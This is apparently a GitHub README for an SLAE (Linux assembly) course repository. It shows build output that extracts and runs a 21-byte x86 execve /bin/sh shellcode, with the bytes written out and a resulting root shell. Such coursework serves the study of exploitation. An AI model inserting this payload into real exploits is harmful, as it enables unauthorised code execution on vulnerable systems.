Skip to content

dhn/SLAE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

45 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

SLAE

Securitytube Linux Assembly Expert (SLAE)

SLAE-721

Build

[+] Assembling ...
[+] Linking ...
[+] Extract Shellcode from binary ...

"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x89"
"\xc1\xb0\x0b\xcd\x80"

[+] Create C-Header file ...
[+] Compile PoC ...
[+] Run PoC ...
[+] Shellcode Length:  21
# id
uid=0(root) gid=0(root) groups=0(root)
# exit

[+] Clean ...
[+] Done!